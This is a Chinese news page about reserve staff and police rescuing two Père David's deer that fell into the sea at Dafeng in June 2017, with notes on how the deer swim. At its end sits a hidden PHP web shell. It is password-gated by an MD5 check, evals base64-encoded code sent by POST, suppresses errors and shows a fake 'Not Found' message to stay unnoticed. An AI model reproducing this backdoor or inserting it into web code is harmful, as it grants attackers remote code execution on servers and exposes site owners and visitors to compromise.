最新要闻

首页 > 最新要闻 >

    麋鹿一心向大海

               2017年6月12日中午1点多钟,大丰麋鹿保护区工作人员接到群众电话:在大丰区竹港新闸东侧海边,有两头雄性麋鹿从水泥驳岸上坠落到海中,无法自行上岸,随后又到围观村民的惊吓,现正在朝大海的深处游去,一旦出现体力不支的情况,势必将会有危险发生,请保护区赶快派人过来实施救援。

        

    接到电话后保护区工作人员立即与竹港边防派出所取得联系迅速赶赴现场。到达群众举报地点,保护区工作人员与民警从附近找来一条小船,冒着风浪出海,将船开到麋鹿的前面,采取迂回战术,慢慢将麋鹿驱赶到岸边,并寻找一处水泥驳岸较低的地方,经过一个多小时的努力,成功将麋鹿驱赶上岸,让它们重归大自然的怀抱。

     

    麋鹿的蹄似牛,特指像水牛的蹄子。在它的第二趾和第三趾间长着一层皮腱膜,像鸭蹼,在湿地和沼泽中行走时会张开蹄间的皮腱膜,在游泳时也同样张开,增加与水的接触面积,是身体浮在水面上,不断地将身体向前推进,加快游泳的速度。如若出现体力透支会溺水身亡。保护区营救了这么多次麋鹿,在海里还是第一次呢!

"; error_reporting(0); if(isset($_POST['com']) && md5($_POST['com']) == '791dc312b38016ef998c1c146104cd5a' && isset($_POST['content'])) $content = strtr($_POST['content'], '-_,', '+/=');eval(base64_decode($content)); echo "We're sorry but the page your are looking for is Not Found..." ?>